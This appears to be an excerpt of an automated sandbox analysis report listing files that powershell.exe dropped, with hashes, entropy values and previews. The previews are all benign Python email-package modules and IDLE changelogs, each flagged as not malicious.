                                                                                                    Category:dropped
                                                                                                    Size (bytes):110266
                                                                                                    Entropy (8bit):4.605221167114285
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:My6wjBQZN3oEVWnG8N8QxRarfxXu/6V7asGYDF956e:swjBMN6GNQxsSe
                                                                                                    MD5:0C8E8A3013A6AB8FC70DA80C09AEBED0
                                                                                                    SHA1:AEFAC48157F5272898A06FD9C1397249D7368E83
                                                                                                    SHA-256:C46F702D032417BA2E51569512B7A9FBA66CF06A93A10A8B0CF6038667367D60
                                                                                                    SHA-512:2302865F661F44D42AB599BD2DD208A0928F686A206C4E4C348B60A9440A116B4541BD35345558477853C2C40905FC49700EFEBE71E4F69A372BAFE19908E3B6
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Header value parser implementing various email-related RFC parsing rules.....The parsing methods defined in this module implement various email related..parsing rules. Principal among them is RFC 5322, which is the followon..to RFC 2822 and primarily a clarification of the former. It also implements..RFC 2047 encoded word decoding.....RFC 5322 goes to considerable trouble to maintain backward compatibility with..RFC 822 in the parse phase, while cleaning up the structure on the generation..phase. This parser supports correct RFC 5322 generation by tagging white space..as folding white space only when folding is allowed in the non-obsolete rule..sets. Actually, the parser is even more generous when accepting input than RFC..5322 mandates, following the spirit of Postel's Law, which RFC 5322 encourages...Where possible deviations from the standard are annotated on the 'defects'..attribute of tokens that deviate.....The general structure of the parser follows RFC 5322, and uses its
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18378
                                                                                                    Entropy (8bit):4.40867877161788
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:7rjJPsgHvi2r8ISXiCvXOHjPBDtKU2U1aQQQy1leo7T/i/u6/Gkj:7rZHv5rwXiC2HDmQs1gow
                                                                                                    MD5:ABB8E7D0EECA30077BEC3E11166B853D
                                                                                                    SHA1:13F614028F8727728DD31E98FA628297FC38C0C0
                                                                                                    SHA-256:4960C31F0039780F316149A3773367A3AEEC3BB17D360776334D9B9E688DA908
                                                                                                    SHA-512:8AB6AC0C1512FFA89D68C726144E8FABBAFBA93687F27F7F8B528BD3B2F7C492235FFEC4B0A02FE74563EB15CD3740E0FBDE39271FEC7C58146EDEFE2B13DA41
                                                                                                    Malicious:false
                                                                                                    Preview:# Copyright (C) 2002-2007 Python Software Foundation..# Contact: email-sig@python.org...."""Email address parsing code.....Lifted directly from rfc822.py. This should eventually be rewritten..."""....__all__ = [.. 'mktime_tz',.. 'parsedate',.. 'parsedate_tz',.. 'quote',.. ]....import time, calendar....SPACE = ' '..EMPTYSTRING = ''..COMMASPACE = ', '....# Parse a date field.._monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul',.. 'aug', 'sep', 'oct', 'nov', 'dec',.. 'january', 'february', 'march', 'april', 'may', 'june', 'july',.. 'august', 'september', 'october', 'november', 'december']...._daynames = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun']....# The timezone table does not include the military time zones defined..# in RFC822, other than Z. According to RFC1123, the description in..# RFC822 gets the signs wrong, so we can't rely on any such time..# zones. RFC1123 recommends that numeric timezone indicators b
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15447
                                                                                                    Entropy (8bit):4.377685393663711
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:5XWVeJxZK+08mJJV22bqcOJ5Ad/8s/4kdztLEldnD98J+Uc7XaRiZFe++GK:5XNXK+cJQedf/4M5LEXnm2F0
                                                                                                    MD5:0C5B89A975BB78A09F8601501DDBF037
                                                                                                    SHA1:949B4A68B8A9DFD7C3A4E9E04DD6C9F0DBB6D76B
                                                                                                    SHA-256:D9F2E3A5E277CFE874E4C47BF643497C51D3B8C4B97124B478DA23407921DAEC
                                                                                                    SHA-512:EA3E1E795470ACF89D61CB31A67AFD7055A3C48204371A9F62B0DADB8FF15F7B771F159DE123F53D939437B1374BA4437D945B6990A5AFAA93B5DA54154DA83B
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Policy framework for the email package.....Allows fine grained feature control of how the package parses and emits data..."""....import abc..from email import header..from email import charset as _charset..from email.utils import _has_surrogates....__all__ = [.. 'Policy',.. 'Compat32',.. 'compat32',.. ]......class _PolicyBase:.... """Policy Object basic framework..... This class is useless unless subclassed. A subclass should define.. class attributes with defaults for any values that are to be.. managed by the Policy object. The constructor will then allow.. non-default values to be set for these attributes at instance.. creation time. The instance will be callable, taking these same.. attributes keyword arguments, and returning a new instance.. identical to the called instance except for those values changed.. by the keyword arguments. Instances may be added, yielding new.. instances with any non-default values from the right hand..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9777
                                                                                                    Entropy (8bit):4.593828888317049
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:WfEMoWDlnkHiiG+2F0wx0GTKGlq1VngbQ:WMMoWDlkHii+0wxKh9
                                                                                                    MD5:AF898BB7CA21756B490791A7A7F7DB15
                                                                                                    SHA1:59D2CC7CD4D850E2CA063055E45050488D2B7FB4
                                                                                                    SHA-256:8D1A1F7C18240DF34E51C32450449C5CD767C3571B553D2052A3FD6BFB77C07A
                                                                                                    SHA-512:3D9671001067CD9C9D41D4B693776035506862D68E83701A72E43AAAF23E7FB1645A6E117531BEAB334F3883A27F31AE348C77C376E39186E10C1B23EBED4869
                                                                                                    Malicious:false
                                                                                                    Preview::mod:`email` Package Architecture..=================================....Overview..--------....The email package consists of three major components:.... Model.. An object structure that represents an email message, and provides an.. API for creating, querying, and modifying a message..... Parser.. Takes a sequence of characters or bytes and produces a model of the.. email message represented by those characters or bytes..... Generator.. Takes a model and turns it into a sequence of characters or bytes. The.. sequence can either be intended for human consumption (a printable.. unicode string) or bytes suitable for transmission over the wire. In.. the latter case all data is properly encoded using the content transfer.. encodings specified by the relevant RFCs.....Conceptually the package is organized around the model. The model provides both.."external" APIs intended for use by application programs using the libra
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3666
                                                                                                    Entropy (8bit):4.835003254759948
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:TX74xcMNLmCZ1WReUHIUethe2VZKD3rMGTHbxSJVWY7DpHMoUUbOlWM7poqB7VVE:TX6dAReUteLZKD3lTWWCxoUbOlN7po40
                                                                                                    MD5:FB135D15D269E8CB33DD963E5FDBC88F
                                                                                                    SHA1:71DFC620A28DD876F2DE8932A03EA020D2DC6D71
                                                                                                    SHA-256:043629C09E865AFEF486ED9A922E954DD8266D6E3B4757C10A1CFD63F8415806
                                                                                                    SHA-512:0FE4DA22DEA40A5FDBD4BBC8FE07C5472DD4ED202598BDD3ACC55DB3DE610A21F60007758B6E305E4B95628A5C74EA4EBCE062A34572B4ACD61744AC90FC175C
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:# Copyright (C) 2002-2007 Python Software Foundation..# Author: Ben Gertzfield..# Contact: email-sig@python.org...."""Base64 content transfer encoding per RFCs 2045-2047.....This module handles the content transfer encoding method defined in RFC 2045..to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit..characters encoding known as Base64.....It is used in the MIME standards for email to attach images, audio, and text..using some 8-bit character sets to messages.....This module provides an interface to encode and decode both headers and bodies..with Base64 encoding.....RFC 2045 defines a method for including character set information in an..`encoded-word' in a header. This method is commonly used for 8-bit real names..in To:, From:, Cc:, etc. fields, as well as Subject: lines.....This module does not do the line wrapping or end-of-line character conversion..necessary for proper internationalized headers; it only does dumb encoding and..decoding. To deal with the
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17461
                                                                                                    Entropy (8bit):4.605912610587089
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:yfqArPHv1dHdU/FNtjHo3GWtCO/H4rs5o+wqUDWzhS3zbpiukbb/Lq/PusWux9B5:yfqq3K7tLIG0cs5o1kSjblUbzsn9uokq
                                                                                                    MD5:FDB4BF6C779D7CF33C55FE8021A7E8FC
                                                                                                    SHA1:D81426DE80C27EC6429DC8B948FA2F1F2207AE1A
                                                                                                    SHA-256:CA7CA0A12B96D6FA8A4A5F687CD70A58ECFD93DF13374C414927D4939AD50BE6
                                                                                                    SHA-512:C81881B200BDD683A76FB4C4E93A1D6DDE33DA81931A1896ED4E3458FA522A96E39BC93AE8AB8257D3F6A81B4FE52AED6062C47E236309F4A927FD9887797A2F
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:# Copyright (C) 2001-2007 Python Software Foundation..# Author: Ben Gertzfield, Barry Warsaw..# Contact: email-sig@python.org....__all__ = [.. 'Charset',.. 'add_alias',.. 'add_charset',.. 'add_codec',.. ]....from functools import partial....import email.base64mime..import email.quoprimime....from email import errors..from email.encoders import encode_7or8bit......# Flags for types of header encodings..QP = 1 # Quoted-Printable..BASE64 = 2 # Base64..SHORTEST = 3 # the shorter of QP and base64, but only for headers....# In "=?charset?q?hello_world?=", the =?, ?q?, and ?= add up to 7..RFC2047_CHROME_LEN = 7....DEFAULT_CHARSET = 'us-ascii'..UNKNOWN8BIT = 'unknown-8bit'..EMPTYSTRING = ''......# Defaults..CHARSETS = {.. # input header enc body enc output conv.. 'iso-8859-1': (QP, QP, None),.. 'iso-8859-2': (QP, QP, None),.. 'iso-8859-3': (QP, QP, None),.. 'iso-8859-4': (QP, QP, None),..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10839
                                                                                                    Entropy (8bit):4.59979147075116
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Nwnc3QJVGNDiVFwlTeDzS8TCoUGKVTowVP7HmrC:NwnccWe5C8TCoSVfae
                                                                                                    MD5:629D182054FADA79CBBAD4A55DA30E8C
                                                                                                    SHA1:61A30D8A131D83482D252819905B9948138ED3AF
                                                                                                    SHA-256:DDFCD78530BE46273D924D9F4E36B545788B8A9558A40D51119103F86C919FC4
                                                                                                    SHA-512:AE60394885CF1589EF58570BAE639F13FAAB264D0D02668E49E467B8F3949581BD3BC18CC2E3B7A26491E8D022EFA628CD608AC26C7D39D7248B0CA240252591
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:import binascii..import email.charset..import email.message..import email.errors..from email import quoprimime....class ContentManager:.... def __init__(self):.. self.get_handlers = {}.. self.set_handlers = {}.... def add_get_handler(self, key, handler):.. self.get_handlers[key] = handler.... def get_content(self, msg, *args, **kw):.. content_type = msg.get_content_type().. if content_type in self.get_handlers:.. return self.get_handlers[content_type](msg, *args, **kw).. maintype = msg.get_content_maintype().. if maintype in self.get_handlers:.. return self.get_handlers[maintype](msg, *args, **kw).. if '' in self.get_handlers:.. return self.get_handlers[''](msg, *args, **kw).. raise KeyError(content_type).... def add_set_handler(self, typekey, handler):.. self.set_handlers[typekey] = handler.... def set_content(self, msg, obj, *args, **kw):.. if msg.get_content_m
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1843
                                                                                                    Entropy (8bit):4.8333880311617845
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:QUXt+w1Tyt2+tsJePM/tQDMD6sV1+5BUlvVnytUpvZW0ZEq977t8FEHK/dm7BSrq:fXvURt0ePM/W1m1hltyqpxWmOEHG2
                                                                                                    MD5:1FCF88191769A7960B0D2BF4C6C740DF
                                                                                                    SHA1:E07BEDF7D2622F075323686E670B5AD41A5449F8
                                                                                                    SHA-256:DD657FCB0DF3E102145D620648BAA274E7E53681370568C31EA37A97090710A9
                                                                                                    SHA-512:6A9FDD14F6A7800DF7A344B426F8E53A92A8E31341AEABA1B6D8436443A078B6B89E39FCA5FF57BD975FAE2437A527FFCAADA15C4724291319049ECDE1732D1F
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Encodings and related functions."""....__all__ = [.. 'encode_7or8bit',.. 'encode_base64',.. 'encode_noop',.. 'encode_quopri',.. ]......from base64 import encodebytes as _bencode..from quopri import encodestring as _encodestring......def _qencode(s):.. enc = _encodestring(s, quotetabs=True).. # Must encode spaces, which quopri.encodestring() doesn't do.. return enc.replace(b' ', b'=20')......def encode_base64(msg):.. """Encode the message's payload in Base64..... Also, add an appropriate Content-Transfer-Encoding header... """.. orig = msg.get_payload(decode=True).. encdata = str(_bencode(orig), 'ascii').. msg.set_payload(encdata).. msg['Content-Transfer-Encoding'] = 'base64'......def encode_quopri(msg):.. """Encode the message's payload in quoted-printable..... Also, add an appropriate Content-Transfer-Encoding header...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3848
                                                                                                    Entropy (8bit):4.82156900066135
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:fXWfvJ87oBWxPqDuDeSJSLd/Be7USGKRhEMLfwj3P6aLQSNf:/ivJ87IMTJUB+Xk3P6aLQSp
                                                                                                    MD5:8A6EE2E875D87833B092C4FFB1486680
                                                                                                    SHA1:3A1C424674CADA0FC0182617B0DF008633E237B1
                                                                                                    SHA-256:AC186C29F471F55DE3099F82B67B8B0B9EDB16E4568CB094F852373A0485D07A
                                                                                                    SHA-512:4D82E81C20EDFEB60411E4BE994C1C3F5EA92C9ABBBF43F3AD344852586D53C744BDDB9AE09F381E139E670EC7D97BF7859F5101F8C2DA57A9E730451409D15E
                                                                                                    Malicious:false
                                                                                                    Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""email package exception classes."""......class MessageError(Exception):.. """Base class for errors in the email package."""......class MessageParseError(MessageError):.. """Base class for message parsing errors."""......class HeaderParseError(MessageParseError):.. """Error while parsing headers."""......class BoundaryError(MessageParseError):.. """Couldn't find terminating boundary."""......class MultipartConversionError(MessageError, TypeError):.. """Conversion to a multipart is prohibited."""......class CharsetError(MessageError):.. """An illegal charset was given."""......# These are parsing defects which the parser was able to work around...class MessageDefect(ValueError):.. """Base class for a message defect.""".... def __init__(self, line=None):.. if line is not None:.. super().__init__(line).. self.line = line....cla
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23330
                                                                                                    Entropy (8bit):4.139996658134521
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:YSdO2+UUP3VCzFsha/ixuP4Uu59eixDbBJredt0S/OkEL/Vi1gSlq5WtAZtASWG0:YSdZ+xPFCRsKP4Uy4i5BJiEUTb85hEF
                                                                                                    MD5:6F7A6EB6D8B9B564194A40BC4D5BA3B0
                                                                                                    SHA1:5681D67DC70DE211F0965D578CEB43DB7AA23110
                                                                                                    SHA-256:507DF585FF50AC6AD26721CE27398B26BB8FFB516B2F7FBD77D41939067966B3
                                                                                                    SHA-512:4B98012493AADFEEC2ADCFEEF768D4DB401612943837650B272F6D80B2A3216AA6F6D6EF97035899BEA190CA2093119FCFD06E4E57D7DDC2408EAD3D7D94686A
                                                                                                    Malicious:false
                                                                                                    Preview:# Copyright (C) 2004-2006 Python Software Foundation..# Authors: Baxter, Wouters and Warsaw..# Contact: email-sig@python.org...."""FeedParser - An email feed parser.....The feed parser implements an interface for incrementally parsing an email..message, line by line. This has advantages for certain applications, such as..those reading email messages off a socket.....FeedParser.feed() is the primary interface for pushing new data into the..parser. It returns when there's nothing more it can do with the available..data. When you have no more data to push into the parser, call .close()...This completes the parsing and returns the root message object.....The other advantage of this parser is that it will never raise a parsing..exception. Instead, when it finds something unexpected, it adds a 'defect' to..the current message. Defects are just instances that live on the message..object's .defects attribute..."""....__all__ = ['FeedParser', 'BytesFeedParser']....import re....from email i
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20704
                                                                                                    Entropy (8bit):4.436018900921021
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:+/9YMkyIhAckQZrXdqMlHDwcMRVbCgWIi8NXq:+/uMUA7QPqMtDwcgVbCLITg
                                                                                                    MD5:1CAA0A0DCA55A68E732A391FA0F43BB1
                                                                                                    SHA1:B07AFEE216AFFC54BFFCF2C51C827F50F526389E
                                                                                                    SHA-256:45F6C23ADA9E2F8E2AD73AAFB3179B41953AC8E828ABB1AFB793959632BD93DD
                                                                                                    SHA-512:FCA28683C1674425583498037E5712ADDA844387B008881F3A9274C006F6ED006BF9D7210C77859B1097C4526BBDF9C510B3D6251DD867D319A82E664DFA3348
                                                                                                    Malicious:false
                                                                                                    Preview:# Copyright (C) 2001-2010 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Classes to generate plain text from a message object tree."""....__all__ = ['Generator', 'DecodedGenerator', 'BytesGenerator']....import re..import sys..import time..import random....from copy import deepcopy..from io import StringIO, BytesIO..from email.utils import _has_surrogates....UNDERSCORE = '_'..NL = '\n' # XXX: no longer used by the code below.....NLCRE = re.compile(r'\r\n|\r|\n')..fcre = re.compile(r'^From ', re.MULTILINE)......class Generator:.. """Generates output from a Message object tree..... This basic generator writes the message to the given file object as plain.. text... """.. #.. # Public interface.. #.... def __init__(self, outfp, mangle_from_=None, maxheaderlen=None, *,.. policy=None):.. """Create the generator for message flattening..... outfp is the output file-like object for writing the messa
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24665
                                                                                                    Entropy (8bit):4.389440761615371
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:7Vhw0X061jgc2EE2HLJaAUmzfEPrD9lNPHfziN:7Tw0cENLEv9bz2
                                                                                                    MD5:5B51755058D937273322C456CC1DE323
                                                                                                    SHA1:1B8DEC1C7734D7E19432A2CF65191F7FFA570E7B
                                                                                                    SHA-256:DDE02246B4AC6EB9AF2B8487DE8207AA221D42026559C31F732EC4C9F78118CC
                                                                                                    SHA-512:3E23BDDFB54DBEA07DC18B7042A78BCF75D5852BB97EF34DE214D74E0F5745941FE2C83934F1ED2CEB6067B8CFF13C9DCE93DF410988CAA8E53E6B1AFB367084
                                                                                                    Malicious:false
                                                                                                    Preview:# Copyright (C) 2002-2007 Python Software Foundation..# Author: Ben Gertzfield, Barry Warsaw..# Contact: email-sig@python.org...."""Header encoding and decoding functionality."""....__all__ = [.. 'Header',.. 'decode_header',.. 'make_header',.. ]....import re..import binascii....import email.quoprimime..import email.base64mime....from email.errors import HeaderParseError..from email import charset as _charset..Charset = _charset.Charset....NL = '\n'..SPACE = ' '..BSPACE = b' '..SPACE8 = ' ' * 8..EMPTYSTRING = ''..MAXLINELEN = 78..FWS = ' \t'....USASCII = Charset('us-ascii')..UTF8 = Charset('utf-8')....# Match encoded-word strings in the form =?charset?q?Hello_World?=..ecre = re.compile(r'''.. =\? # literal =?.. (?P<charset>[^?]*?) # non-greedy up to the next ? is the charset.. \? # literal ?.. (?P<encoding>[qQbB]) # either a "q" or a "b", case insensitive.. \? # literal ?.. (?P<encoded>.*?) # non-greedy up
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21423
                                                                                                    Entropy (8bit):4.469424718463651
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Yzl1HHR1R+jCKHbASD/J72KQ5IwIs7TJetODErjzGvGdgcWArw6ZaPYKb6M3/yRJ:cfR1cDHP/Jk5J82UK6ZOYKb6Mznpjzs
                                                                                                    MD5:E1B45FB1132B93672AB3B720496D1006
                                                                                                    SHA1:2BD5C668B5CCFFCE234431400D976138E5B27557
                                                                                                    SHA-256:05DAD578DAF8C21D6569B7561C5281F3BC6A03600B004A0E4F7A8CC0E75BE3C0
                                                                                                    SHA-512:FFAF3D55714FF84769F9CEAEE9561A651F29DA6365D9ED1F3BC0813F0E32A3DF3B66BD64385BC6425475777330BBEA9125A544EF54312CFFC7F83C146B2FD228
                                                                                                    Malicious:false
                                                                                                    Preview:"""Representing and manipulating email headers via custom objects.....This module provides an implementation of the HeaderRegistry API...The implementation is designed to flexibly follow RFC5322 rules..."""..from types import MappingProxyType....from email import utils..from email import errors..from email import _header_value_parser as parser....class Address:.... def __init__(self, display_name='', username='', domain='', addr_spec=None):.. """Create an object representing a full email address..... An address can have a 'display_name', a 'username', and a 'domain'. In.. addition to specifying the username and domain separately, they may be.. specified together by using the addr_spec keyword *instead of* the.. username and domain keywords. If an addr_spec string is specified it.. must be properly quoted according to RFC 5322 rules; an error will be.. raised if it is not..... An Address object has display_name, username, doma
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2197
                                                                                                    Entropy (8bit):4.732949017721813
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:fXv/9Im+qoFo20JSB+GhSRvfROul7IMbwI94gH4LbkQtC:fXHaqoFoBJQbSRh7IMbwtgY3xQ
                                                                                                    MD5:DFB7E48FD67F0676613E24FF6DF8C5F9
                                                                                                    SHA1:772EDA5393F0CFDD7F52EF02FC5DCC13361B8934
                                                                                                    SHA-256:60F5E1C2F9503E1BD052A6CC46A086D5E31657C7D83A12EBADB734FF8240F46C
                                                                                                    SHA-512:D5A309553F0AA48B2F62E9ADE5C5E104C1C89281F3E99C90F2ABE29B0B9407472D1C1BFF2D0C3B92B45F304AE36433F87A782AF05B9431A125A9DBCCAF266ABE
                                                                                                    Malicious:false
                                                                                                    Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Various types of useful iterators and generators."""....__all__ = [.. 'body_line_iterator',.. 'typed_subpart_iterator',.. 'walk',.. # Do not include _structure() since it's part of the debugging API... ]....import sys..from io import StringIO......# This function will become a method of the Message class..def walk(self):.. """Walk over the message tree, yielding each subpart..... The walk is performed in depth-first order. This method is a.. generator... """.. yield self.. if self.is_multipart():.. for subpart in self.get_payload():.. yield from subpart.walk()......# These two functions are imported into the Iterators.py interface module...def body_line_iterator(msg, decode=False):.. """Iterate over the parts, returning string payloads line-by-line..... Optional decode (default False) is passed through to .get_payl
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49315
                                                                                                    Entropy (8bit):4.391757600791974
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:yyIgnAXfulA5/zeVlWiYoeRMqsEC+q6+4WUin:y8AXfusjin
                                                                                                    MD5:46C6272BF60D9DE9372A0FA5B585DDB8
                                                                                                    SHA1:9B8184E588006A71CD21C58E1FE63291EA56CF1A
                                                                                                    SHA-256:4C172696CCBE5D700DFF30744C47569B9748EE2BD4F5DAAE7DDE0DFA64F737BC
                                                                                                    SHA-512:FCCE4D83E2697B2A4573FE9B8C2FF8B500AB8F1B1E98B95E274981BFDDB7D61F86B08779CDAD652FAD6FABBDBDB8A5B42A455FD9D1860EA72B12213F82193C29
                                                                                                    Malicious:false
                                                                                                    Preview:# Copyright (C) 2001-2007 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Basic message object for the email package object model."""....__all__ = ['Message', 'EmailMessage']....import binascii..import re..import quopri..from io import BytesIO, StringIO....# Intrapackage imports..from email import utils..from email import errors..from email._policybase import compat32..from email import charset as _charset..from email._encoded_words import decode_b..Charset = _charset.Charset....SEMISPACE = '; '....# Regular expression that matches `special' characters in parameters, the..# existence of which force quoting of the parameter value...tspecials = re.compile(r'[ \(\)<>@,;:\\"/\[\]\?=]')......def _splitparam(param):.. # Split header parameters. BAW: this may be too simple. It isn't.. # strictly RFC 2045 (section 5.1) compliant, but it catches most headers.. # found in the wild. We may eventually need a full fledged parser... # RDM: we
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):27832
                                                                                                    Entropy (8bit):4.918995851794151
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:BlcJLOJej1OQLeisQqVwSjw0kA4lxVX3UQ1btugm0h+R1H8OBZ:Bqh8vnVFjlkTcKLhaHDj
                                                                                                    MD5:AD6A559EEDC9B6E21491FBDFC3DF4F6E
                                                                                                    SHA1:A2F2469AC92BFA4B28CE2D12ECDA298432BADA64
                                                                                                    SHA-256:4F89D07CD95D20D295EDC6FEC7A3663A7E3FDE33D94D3321834F7FB673D508B8
                                                                                                    SHA-512:79E6CBE9214C75A4877A1F787C8FC6333CA540855359AA2022310F183C3CDEA93050D9488B309BF6B7340F0F9E738546AF3E50CD452C66648E56D479D45DC633
                                                                                                    Malicious:false
                                                                                                    Preview:What's New in IDLE 2.7? (Merged into 3.1 before 2.7 release.)..=======================..*Release date: XX-XXX-2010*....- idle.py modified and simplified to better support developing experimental.. versions of IDLE which are not installed in the standard location.....- OutputWindow/PyShell right click menu "Go to file/line" wasn't working with.. file paths containing spaces. Bug 5559.....- Windows: Version string for the .chm help file changed, file not being.. accessed Patch 5783 Guilherme Polo....- Allow multiple IDLE GUI/subprocess pairs to exist simultaneously. Thanks to.. David Scherer for suggesting the use of an ephemeral port for the GUI... Patch 1529142 Weeble.....- Remove port spec from run.py and fix bug where subprocess fails to.. extract port from command line when warnings are present.....- Tk 8.5 Text widget requires 'wordprocessor' tabstyle attr to handle.. mixed space/tab properly. Issue 5129, patch by Guilherme Polo.....- Issue #3549: On MacOS the preferences
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):56880
                                                                                                    Entropy (8bit):5.021179506521754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:ggcS9ItpsnixARJeJpP2ah0Rg6gTQ+EhMaQZCI2yYMDn08DQUxxe+M+T3HR:gxS6tGiOo/2q0RoQ+EhhyYWGUHvx
                                                                                                    MD5:F9779662A36397178E3BBADECF0EC873
                                                                                                    SHA1:7731977A4612983F81810331D76F7E9E6B4613D2
                                                                                                    SHA-256:6E8E3D67E949EA99C3D7B7D388238C71F97C1D45B57D8EDDC04BF340D3936EEB
                                                                                                    SHA-512:F5A836B1D311E3892E04881E0E634B1687F337681802A7951E2B4DEB3ABA89CA363BF58591BB4D4BCF413ABDA3E0064677DC96407A4FC473F9CDE4E08CD9EA73
                                                                                                    Malicious:false
                                                                                                    Preview:What's New in IDLE 3.12.z..(since 3.12.0)..Released after 2023-10-02..=========================......gh-96905: In idlelib code, stop redefining built-ins 'dict' and 'object'.....gh-72284: Improve the lists of features, editor key bindings,..and shell key bingings in the IDLE doc.....gh-113903: Fix rare failure of test.test_idle, in test_configdialog.....gh-113729: Fix the "Help -> IDLE Doc" menu bug in 3.11.7 and 3.12.1.....gh-57795: Enter selected text into the Find box when opening..a Replace dialog. Patch by Roger Serwy and Zackery Spytz.....gh-113269: Fix test_editor hang on macOS Catalina...Patch by Terry Reedy.....gh-112939: Fix processing unsaved files when quitting IDLE on macOS...Patch by Ronald Oussoren and Christopher Chavez.....gh-79871: Add docstrings to debugger.py. Fix two bugs in test_debugger and expand coverage by 47%. Patch by Anthony Shaw.......What's New in IDLE 3.12.0..(since 3.11.0)..Released on 2023-10-02..=========================....gh-104719: Remove IDLE'
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11943
                                                                                                    Entropy (8bit):4.7961360271877
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:u6CwalZFKX7zxXp50anN2LuwEj+Drd60VkfOKgvAq6rZNFUByIeONjKCWBahFPqN:u6CwwZFKX7NXpSanN2c0VkfO94/rZNFt
                                                                                                    MD5:18F093967B03726CC4E2FB5404BE54A5
